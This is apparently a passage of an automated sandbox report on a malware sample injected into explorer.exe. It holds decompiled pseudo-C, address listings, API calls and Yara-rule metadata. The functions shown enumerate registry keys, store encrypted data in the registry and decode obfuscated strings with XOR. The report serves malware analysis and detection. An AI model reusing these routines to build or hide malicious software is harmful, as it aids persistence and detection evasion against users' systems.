						_t177 = _t179 + 0x10;
						_t174 = "\\";
					}
					_t135 = E007A9A07(_v12);
					_t167 =  *0x7bf818; // 0xeaf6c8
					_t177 = _t177 + 0x18;
					_t173 = _t135;
					_v20 = _t173;
					 *((intOrPtr*)(_t167 + 0x34))(_v12, _t174, _v16, _t174,  &_v108, _t172);
					E007A8BF4( &_v40, 0xffffffff);
					goto L20;
				}
			}














































                                                                                                                                                                        0x007aa63c
                                                                                                                                                                        0x007aa63e
                                                                                                                                                                        0x007aa641
                                                                                                                                                                        0x007aa643
                                                                                                                                                                        0x007aa64b
                                                                                                                                                                        0x007aa64e
                                                                                                                                                                        0x007aa655
                                                                                                                                                                        0x007aa658
                                                                                                                                                                        0x007aa65d
                                                                                                                                                                        0x007aa65f
                                                                                                                                                                        0x007aa663
                                                                                                                                                                        0x007aa665
                                                                                                                                                                        0x007aa906
                                                                                                                                                                        0x007aa906
                                                                                                                                                                        0x007aa66b
                                                                                                                                                                        0x007aa673
                                                                                                                                                                        0x007aa679
                                                                                                                                                                        0x007aa680
                                                                                                                                                                        0x007aa688
                                                                                                                                                                        0x007aa68b
                                                                                                                                                                        0x007aa68d
                                                                                                                                                                        0x007aa68d
                                                                                                                                                                        0x007aa695
                                                                                                                                                                        0x007aa698
                                                                                                                                                                        0x007aa69d
                                                                                                                                                                        0x007aa6a0
                                                                                                                                                                        0x007aa6a5
                                                                                                                                                                        0x007aa7de
                                                                                                                                                                        0x007aa7de
                                                                                                                                                                        0x007aa7e4
                                                                                                                                                                        0x007aa7eb
                                                                                                                                                                        0x007aa82c
                                                                                                                                                                        0x007aa830
                                                                                                                                                                        0x007aa831
                                                                                                                                                                        0x007aa837
                                                                                                                                                                        0x007aa83c
                                                                                                                                                                        0x007aa83f
                                                                                                                                                                        0x007aa83f
                                                                                                                                                                        0x007aa841
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa841
                                                                                                                                                                        0x007aa7f0
                                                                                                                                                                        0x007aa7fa
                                                                                                                                                                        0x007aa803
                                                                                                                                                                        0x007aa808
                                                                                                                                                                        0x007aa80b
                                                                                                                                                                        0x007aa80e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa810
                                                                                                                                                                        0x007aa814
                                                                                                                                                                        0x007aa815
                                                                                                                                                                        0x007aa81a
                                                                                                                                                                        0x007aa81b
                                                                                                                                                                        0x007aa81e
                                                                                                                                                                        0x007aa822
                                                                                                                                                                        0x007aa827
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa6ab
                                                                                                                                                                        0x007aa6ab
                                                                                                                                                                        0x007aa6b6
                                                                                                                                                                        0x007aa6b8
                                                                                                                                                                        0x007aa6bd
                                                                                                                                                                        0x007aa6c3
                                                                                                                                                                        0x007aa7db
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa7db
                                                                                                                                                                        0x007aa6cc
                                                                                                                                                                        0x007aa6d0
                                                                                                                                                                        0x007aa6d8
                                                                                                                                                                        0x007aa6df
                                                                                                                                                                        0x007aa6e5
                                                                                                                                                                        0x007aa844
                                                                                                                                                                        0x007aa847
                                                                                                                                                                        0x007aa864
                                                                                                                                                                        0x007aa88b
                                                                                                                                                                        0x007aa88e
                                                                                                                                                                        0x007aa890
                                                                                                                                                                        0x007aa892
                                                                                                                                                                        0x007aa892
                                                                                                                                                                        0x007aa8a0
                                                                                                                                                                        0x007aa89b
                                                                                                                                                                        0x007aa8a5
                                                                                                                                                                        0x007aa8d4
                                                                                                                                                                        0x007aa8dd
                                                                                                                                                                        0x007aa8e9
                                                                                                                                                                        0x007aa8f1
                                                                                                                                                                        0x007aa8f3
                                                                                                                                                                        0x007aa8f9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa900
                                                                                                                                                                        0x007aa8ab
                                                                                                                                                                        0x007aa8b1
                                                                                                                                                                        0x007aa8b6
                                                                                                                                                                        0x007aa8bb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa8bd
                                                                                                                                                                        0x007aa8bd
                                                                                                                                                                        0x007aa8c9
                                                                                                                                                                        0x007aa8cd
                                                                                                                                                                        0x007aa8ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa8d2
                                                                                                                                                                        0x007aa869
                                                                                                                                                                        0x007aa87b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa87d
                                                                                                                                                                        0x007aa882
                                                                                                                                                                        0x007aa884
                                                                                                                                                                        0x007aa884
                                                                                                                                                                        0x007aa8a0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa8a0
                                                                                                                                                                        0x007aa6eb
                                                                                                                                                                        0x007aa6ec
                                                                                                                                                                        0x007aa6ef
                                                                                                                                                                        0x007aa6f4
                                                                                                                                                                        0x007aa6f8
                                                                                                                                                                        0x007aa6fd
                                                                                                                                                                        0x007aa700
                                                                                                                                                                        0x007aa705
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa70e
                                                                                                                                                                        0x007aa70f
                                                                                                                                                                        0x007aa714
                                                                                                                                                                        0x007aa715
                                                                                                                                                                        0x007aa716
                                                                                                                                                                        0x007aa71b
                                                                                                                                                                        0x007aa723
                                                                                                                                                                        0x007aa79b
                                                                                                                                                                        0x007aa7a3
                                                                                                                                                                        0x007aa725
                                                                                                                                                                        0x007aa72a
                                                                                                                                                                        0x007aa72f
                                                                                                                                                                        0x007aa730
                                                                                                                                                                        0x007aa731
                                                                                                                                                                        0x007aa739
                                                                                                                                                                        0x007aa741
                                                                                                                                                                        0x007aa747
                                                                                                                                                                        0x007aa74a
                                                                                                                                                                        0x007aa752
                                                                                                                                                                        0x007aa755
                                                                                                                                                                        0x007aa75a
                                                                                                                                                                        0x007aa75b
                                                                                                                                                                        0x007aa75c
                                                                                                                                                                        0x007aa75f
                                                                                                                                                                        0x007aa762
                                                                                                                                                                        0x007aa76c
                                                                                                                                                                        0x007aa76e
                                                                                                                                                                        0x007aa773
                                                                                                                                                                        0x007aa775
                                                                                                                                                                        0x007aa775
                                                                                                                                                                        0x007aa773
                                                                                                                                                                        0x007aa781
                                                                                                                                                                        0x007aa78c
                                                                                                                                                                        0x007aa791
                                                                                                                                                                        0x007aa794
                                                                                                                                                                        0x007aa794
                                                                                                                                                                        0x007aa7b3
                                                                                                                                                                        0x007aa7b8
                                                                                                                                                                        0x007aa7be
                                                                                                                                                                        0x007aa7c1
                                                                                                                                                                        0x007aa7c3
                                                                                                                                                                        0x007aa7c9
                                                                                                                                                                        0x007aa7d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aa7d8

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                          • Part of subcall function 007A8BF4: RtlFreeHeap.NTDLL(00000000,00000000), ref: 007A8C3A
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,007AA621,?,?,00000001), ref: 007AA85F
                                                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000,?,?,00000001), ref: 007AA876
                                                                                                                                                                        • RegCloseKey.KERNELBASE(007AA621,?,?,00000001), ref: 007AA8A0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocateCloseCreateFreeOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3570936880-0
                                                                                                                                                                        • Opcode ID: 8dc8080ade4f16cad1109a01e5cd46d88f4f1248a1e4e0083ac0ccb225d6d234
                                                                                                                                                                        • Instruction ID: dd34783a4bc61c745b1e7d5c8e8add022cd532809b43fab3ccdecbbe270fd1a3
                                                                                                                                                                        • Opcode Fuzzy Hash: 8dc8080ade4f16cad1109a01e5cd46d88f4f1248a1e4e0083ac0ccb225d6d234
                                                                                                                                                                        • Instruction Fuzzy Hash: 33917DB1D00209BFDB11DFA8CC45EEEBBB8EF8A710F144269F505A7251D7399A01CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A66C7 Relevance: 4.6, APIs: 3, Instructions: 145registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 481 7a66c7-7a670c memset call 7a8bde 484 7a6712-7a6724 call 7a8bde 481->484 485 7a6876-7a687c 481->485 484->485 488 7a672a-7a6747 RegOpenKeyExW 484->488 489 7a674d-7a6780 488->489 490 7a6846-7a684a 488->490 495 7a6792-7a6797 489->495 496 7a6782-7a678d 489->496 491 7a684c-7a6854 RegCloseKey 490->491 492 7a6857-7a6873 call 7a8bf4 * 2 490->492 491->492 492->485 495->490 498 7a679d 495->498 496->490 502 7a67a0-7a67ef call 7a8d6d * 2 498->502 508 7a6839-7a6840 502->508 509 7a67f1-7a6801 502->509 508->490 508->502 511 7a6803-7a6817 509->511 512 7a6836 509->512 511->512 514 7a6819-7a6826 call 7aa456 511->514 512->508 517 7a6828-7a682a 514->517 518 7a682f-7a6831 call 7abfdb 514->518 517->518 518->512
                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E007A66C7(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				char _t97;
				short* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E007A8BDE(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E007A8BDE(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						RegCloseKey(_v8);
					}
					E007A8BF4( &_v32, 0x3fff);
					E007A8BF4( &_v36, 0x800);
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x7bf820; // 0xeaf8b8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						E007A8D6D(_t97, 0, 0x800);
						E007A8D6D(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x7bf820; // 0xeaf8b8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x7bf824; // 0xeaf990
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x7bf820; // 0xeaf8b8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E007AA456(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E007ABFDB(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x7bf820; // 0xeaf8b8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}































                                                                                                                                                                        0x007a66c7
                                                                                                                                                                        0x007a66c7
                                                                                                                                                                        0x007a66d3
                                                                                                                                                                        0x007a66e2
                                                                                                                                                                        0x007a66e5
                                                                                                                                                                        0x007a66ef
                                                                                                                                                                        0x007a66f7
                                                                                                                                                                        0x007a66fa
                                                                                                                                                                        0x007a6702
                                                                                                                                                                        0x007a6704
                                                                                                                                                                        0x007a6707
                                                                                                                                                                        0x007a670c
                                                                                                                                                                        0x007a6878
                                                                                                                                                                        0x007a687c
                                                                                                                                                                        0x007a687c
                                                                                                                                                                        0x007a671c
                                                                                                                                                                        0x007a671e
                                                                                                                                                                        0x007a6724
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a6747
                                                                                                                                                                        0x007a6846
                                                                                                                                                                        0x007a684a
                                                                                                                                                                        0x007a6854
                                                                                                                                                                        0x007a6854
                                                                                                                                                                        0x007a6860
                                                                                                                                                                        0x007a686e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a6873
                                                                                                                                                                        0x007a6750
                                                                                                                                                                        0x007a6754
                                                                                                                                                                        0x007a6758
                                                                                                                                                                        0x007a675c
                                                                                                                                                                        0x007a6760
                                                                                                                                                                        0x007a6761
                                                                                                                                                                        0x007a6762
                                                                                                                                                                        0x007a6763
                                                                                                                                                                        0x007a6764
                                                                                                                                                                        0x007a6768
                                                                                                                                                                        0x007a676f
                                                                                                                                                                        0x007a6770
                                                                                                                                                                        0x007a6775
                                                                                                                                                                        0x007a6780
                                                                                                                                                                        0x007a6795
                                                                                                                                                                        0x007a6797
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a679d
                                                                                                                                                                        0x007a67a0
                                                                                                                                                                        0x007a67a8
                                                                                                                                                                        0x007a67b5
                                                                                                                                                                        0x007a67ba
                                                                                                                                                                        0x007a67bd
                                                                                                                                                                        0x007a67c6
                                                                                                                                                                        0x007a67cd
                                                                                                                                                                        0x007a67dd
                                                                                                                                                                        0x007a67e7
                                                                                                                                                                        0x007a67ed
                                                                                                                                                                        0x007a67ef
                                                                                                                                                                        0x007a67f4
                                                                                                                                                                        0x007a67fd
                                                                                                                                                                        0x007a67ff
                                                                                                                                                                        0x007a6801
                                                                                                                                                                        0x007a6803
                                                                                                                                                                        0x007a680d
                                                                                                                                                                        0x007a6813
                                                                                                                                                                        0x007a6817
                                                                                                                                                                        0x007a681b
                                                                                                                                                                        0x007a6820
                                                                                                                                                                        0x007a6826
                                                                                                                                                                        0x007a6828
                                                                                                                                                                        0x007a682a
                                                                                                                                                                        0x007a682a
                                                                                                                                                                        0x007a6831
                                                                                                                                                                        0x007a6831
                                                                                                                                                                        0x007a6817
                                                                                                                                                                        0x007a6836
                                                                                                                                                                        0x007a6836
                                                                                                                                                                        0x007a6839
                                                                                                                                                                        0x007a683a
                                                                                                                                                                        0x007a683d
                                                                                                                                                                        0x007a683d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a67a0
                                                                                                                                                                        0x007a6782
                                                                                                                                                                        0x007a678a
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 007A66E5
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,00000001), ref: 007A673F
                                                                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00000001), ref: 007A6854
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateCloseHeapOpenmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4244679422-0
                                                                                                                                                                        • Opcode ID: c4ac25866d7e5cd132b8555e86d9fb88a84a31c1718c3202a71764e751102ee7
                                                                                                                                                                        • Instruction ID: d4a3575016e5d058b8b44b99f90f197074f4d0782b3887212a497653b1c0ec99
                                                                                                                                                                        • Opcode Fuzzy Hash: c4ac25866d7e5cd132b8555e86d9fb88a84a31c1718c3202a71764e751102ee7
                                                                                                                                                                        • Instruction Fuzzy Hash: 73514C71A00209AFDB11EF98CD89FEE7BBCBF49700F148169F505A6151DB399A448BA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AAC4B Relevance: 4.6, APIs: 3, Instructions: 143registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                        			E007AAC4B(signed int __ecx, char __edx, void* __fp0, void* _a4, char _a8, char _a12) {
				char* _v12;
				char _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				char* _v32;
				char _v52;
				char _v64;
				char _v328;
				char _v2832;
				signed int _t46;
				signed int _t47;
				char* _t52;
				long _t70;
				long _t77;
				long _t80;
				void* _t85;
				char _t86;
				intOrPtr _t87;
				void* _t103;
				void* _t104;
				char* _t107;
				char _t109;

				_t46 = __ecx;
				_t86 = __edx;
				_v24 = __ecx;
				if(_a4 == 0 || _a8 == 0) {
					L13:
					_t47 = _t46 | 0xffffffff;
					__eflags = _t47;
					return _t47;
				} else {
					_t116 = __edx;
					if(__edx == 0) {
						goto L13;
					}
					_v28 = E007AA907();
					E007B3548( *((intOrPtr*)(__ecx + 0x108)) + __edx,  &_v2832);
					_t52 = E007B3674(_t116, __fp0,  &_v2832, 0, 0x64);
					_t109 = _a8;
					_v12 = _t52;
					_v20 = _t52 + 6 + _t109;
					_t107 = E007A8BDE(_t52 + 6 + _t109);
					_v32 = _t107;
					if(_t107 != 0) {
						 *_t107 = _a12;
						_t14 =  &(_t107[6]); // 0x6
						_t107[1] = 1;
						_t107[2] = _t109;
						E007A8CBB(_t14, _a4, _t109);
						_t19 = _t109 + 6; // 0x6
						E007B351A( &_v2832, _t19 + _t107, _v12);
						_v16 = _t86;
						_t87 = _v24;
						_v12 =  *((intOrPtr*)(_t87 + 0x108));
						_push( &_v52);
						_t103 = 8;
						E007B06CC( &_v16, _t103, __eflags);
						_push( &_v328);
						_t104 = 0x14;
						E007B02AE( &_v52, _t104);
						_push( &_v328);
						E007B0320(_t107, _v20);
						_t70 = E007AA5D3(_t87);
						_v12 = _t70;
						__eflags = _t70;
						if(_t70 != 0) {
							E007AA035(_v28,  &_v64, 0x10);
							_t77 = RegOpenKeyExA( *(_t87 + 0x10c), _v12, 0, 2,  &_a4);
							__eflags = _t77;
							if(_t77 == 0) {
								_t80 = RegSetValueExA(_a4,  &_v64, 0, 3, _t107, _v20);
								__eflags = _t80;
								if(_t80 != 0) {
									_push(0xfffffffc);
									_pop(0);
								}
								RegCloseKey(_a4);
							} else {
								_push(0xfffffffd);
								_pop(0);
							}
							E007A8BF4( &_v12, 0xffffffff);
						}
						E007A8BF4( &_v32, 0);
						return 0;
					}
					_t85 = 0xfffffffe;
					return _t85;
				}
			}


























                                                                                                                                                                        0x007aac58
                                                                                                                                                                        0x007aac5d
                                                                                                                                                                        0x007aac5f
                                                                                                                                                                        0x007aac62
                                                                                                                                                                        0x007aadcc
                                                                                                                                                                        0x007aadcc
                                                                                                                                                                        0x007aadcc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aac72
                                                                                                                                                                        0x007aac72
                                                                                                                                                                        0x007aac74
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aac89
                                                                                                                                                                        0x007aac97
                                                                                                                                                                        0x007aaca7
                                                                                                                                                                        0x007aacac
                                                                                                                                                                        0x007aacaf
                                                                                                                                                                        0x007aacb8
                                                                                                                                                                        0x007aacc0
                                                                                                                                                                        0x007aacc5
                                                                                                                                                                        0x007aacca
                                                                                                                                                                        0x007aacd7
                                                                                                                                                                        0x007aacd9
                                                                                                                                                                        0x007aace0
                                                                                                                                                                        0x007aace5
                                                                                                                                                                        0x007aace8
                                                                                                                                                                        0x007aacf0
                                                                                                                                                                        0x007aacfd
                                                                                                                                                                        0x007aad02
                                                                                                                                                                        0x007aad08
                                                                                                                                                                        0x007aad11
                                                                                                                                                                        0x007aad17
                                                                                                                                                                        0x007aad1a
                                                                                                                                                                        0x007aad1b
                                                                                                                                                                        0x007aad26
                                                                                                                                                                        0x007aad29
                                                                                                                                                                        0x007aad2d
                                                                                                                                                                        0x007aad3b
                                                                                                                                                                        0x007aad3e
                                                                                                                                                                        0x007aad4a
                                                                                                                                                                        0x007aad4f
                                                                                                                                                                        0x007aad52
                                                                                                                                                                        0x007aad54
                                                                                                                                                                        0x007aad5e
                                                                                                                                                                        0x007aad79
                                                                                                                                                                        0x007aad7c
                                                                                                                                                                        0x007aad7e
                                                                                                                                                                        0x007aad99
                                                                                                                                                                        0x007aad9c
                                                                                                                                                                        0x007aad9e
                                                                                                                                                                        0x007aada0
                                                                                                                                                                        0x007aada2
                                                                                                                                                                        0x007aada2
                                                                                                                                                                        0x007aadab
                                                                                                                                                                        0x007aad80
                                                                                                                                                                        0x007aad80
                                                                                                                                                                        0x007aad82
                                                                                                                                                                        0x007aad82
                                                                                                                                                                        0x007aadb4
                                                                                                                                                                        0x007aadba
                                                                                                                                                                        0x007aadc1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aadc8
                                                                                                                                                                        0x007aacce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007aacce

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 007B3674: lstrlenW.KERNEL32(?,000000B0,000000B0,?,00000000,000000B0,00000228), ref: 007B36BB
                                                                                                                                                                          • Part of subcall function 007B3674: _ftol2_sse.MSVCRT ref: 007B36FE
                                                                                                                                                                          • Part of subcall function 007A8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,007A959D,00000100,?,007A6507), ref: 007A8BEC
                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000002,00000000), ref: 007AAD79
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeapOpen_ftol2_sselstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 15040926-0
                                                                                                                                                                        • Opcode ID: d182efa175fd1f34ea7f3ed7de4881643febf97d17b4bc23453a73d745547239
                                                                                                                                                                        • Instruction ID: 07701d179cfac3b2de6ca02cc13eb941a242ba21e4cdb48d361ee31b75807642
                                                                                                                                                                        • Opcode Fuzzy Hash: d182efa175fd1f34ea7f3ed7de4881643febf97d17b4bc23453a73d745547239
                                                                                                                                                                        • Instruction Fuzzy Hash: 97418272A00219BBCF11DFA4DC45FDEBBB8AF45320F144266F51497291EB78EA44CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A8AC6 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94stringCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 561 7a8ac6-7a8ae2 562 7a8b0b-7a8b20 561->562 563 7a8ae4 561->563 565 7a8b22-7a8b28 562->565 566 7a8b35-7a8b3b 562->566 564 7a8ae6-7a8afe 563->564 567 7a8b00-7a8b03 564->567 568 7a8b07-7a8b09 564->568 565->565 569 7a8b2a-7a8b2f 565->569 570 7a8b49-7a8b65 lstrlenA call 7a8bde 566->570 571 7a8b3d-7a8b47 566->571 567->564 572 7a8b05 567->572 568->562 569->566 573 7a8b31-7a8b33 569->573 576 7a8b6e-7a8b70 570->576 577 7a8b67-7a8b6c 570->577 571->570 571->571 572->562 573->571 579 7a8b72 576->579 580 7a8b95 576->580 578 7a8b97-7a8b9b 577->578 581 7a8b75-7a8b93 579->581 580->578 581->580 581->581
                                                                                                                                                                        C-Code - Quality: 89%
                                                                                                                                                                        			E007A8AC6(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				signed int _v16;
				char _v36;
				signed int _t37;
				void* _t41;
				signed int _t54;
				signed int _t57;
				signed int _t59;
				void* _t60;
				signed int _t62;
				void* _t70;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				void* _t77;

				_t74 = _a12;
				_t54 = 0;
				_v8 = __ecx;
				_v16 = 0x5a;
				if(_t74 >= __edx) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					_t76 = 0;
					_t37 = 0;
					if(_v36 == 0) {
						L10:
						_t62 = _t37;
						_t57 = _t76;
						if(_t62 == 0) {
							L12:
							lstrlenA( &_v36);
							_t41 = E007A8BDE(2 + _t54 * 2); // executed
							_t70 = _t41;
							if(_t70 != 0) {
								if(_t54 == 0) {
									L17:
									return _t70;
								}
								_t59 = _a12;
								do {
									 *((short*)(_t70 + _t76 * 2)) = ( *(_t59 % _v16 + _a4) ^  *(_t59 + _v8)) & 0x000000ff;
									_t76 = _t76 + 1;
									_t59 = _t59 + 1;
								} while (_t76 < _t54);
								goto L17;
							}
							return 0x7bf8fc;
						} else {
							goto L11;
						}
						do {
							L11:
							_t17 = _t57 + 0x30; // 0x30
							 *((char*)(_t77 + _t57 - 0x20)) = _t17;
							_t57 = _t57 + 1;
						} while (_t57 < _t62);
						goto L12;
					} else {
						goto L7;
					}
					do {
						L7:
						_t37 = _t37 + 1;
					} while ( *((char*)(_t77 + _t37 - 0x20)) != 0);
					_t62 = 0xe;
					if(_t37 <= _t62) {
						goto L10;
					}
					_t57 = 0;
					goto L11;
				}
				_t60 = __edx;
				while(1) {
					_t71 = 0x5a;
					_t73 = _a12;
					if( *((intOrPtr*)(_t74 % _t71 + _a4)) ==  *((intOrPtr*)(_t74 + _v8))) {
						break;
					}
					_t74 = _t74 + 1;
					if(_t74 < _t60) {
						continue;
					}
					goto L6;
				}
				_t54 = _t74 - _t73;
				goto L6;
			}



















                                                                                                                                                                        0x007a8ace
                                                                                                                                                                        0x007a8ad3
                                                                                                                                                                        0x007a8ad5
                                                                                                                                                                        0x007a8ad8
                                                                                                                                                                        0x007a8ae2
                                                                                                                                                                        0x007a8b0b
                                                                                                                                                                        0x007a8b13
                                                                                                                                                                        0x007a8b14
                                                                                                                                                                        0x007a8b15
                                                                                                                                                                        0x007a8b16
                                                                                                                                                                        0x007a8b17
                                                                                                                                                                        0x007a8b19
                                                                                                                                                                        0x007a8b1b
                                                                                                                                                                        0x007a8b20
                                                                                                                                                                        0x007a8b35
                                                                                                                                                                        0x007a8b35
                                                                                                                                                                        0x007a8b37
                                                                                                                                                                        0x007a8b3b
                                                                                                                                                                        0x007a8b49
                                                                                                                                                                        0x007a8b4d
                                                                                                                                                                        0x007a8b5b
                                                                                                                                                                        0x007a8b60
                                                                                                                                                                        0x007a8b65
                                                                                                                                                                        0x007a8b70
                                                                                                                                                                        0x007a8b95
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8b95
                                                                                                                                                                        0x007a8b72
                                                                                                                                                                        0x007a8b75
                                                                                                                                                                        0x007a8b8b
                                                                                                                                                                        0x007a8b8f
                                                                                                                                                                        0x007a8b90
                                                                                                                                                                        0x007a8b91
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8b75
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8b3d
                                                                                                                                                                        0x007a8b3d
                                                                                                                                                                        0x007a8b3d
                                                                                                                                                                        0x007a8b40
                                                                                                                                                                        0x007a8b44
                                                                                                                                                                        0x007a8b45
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a8b22
                                                                                                                                                                        0x007a8b22
                                                                                                                                                                        0x007a8b22
                                                                                                                                                                        0x007a8b23
                                                                                                                                                                        0x007a8b2c
                                                                                                                                                                        0x007a8b2f
                                                                                                                                                                        0x00000000
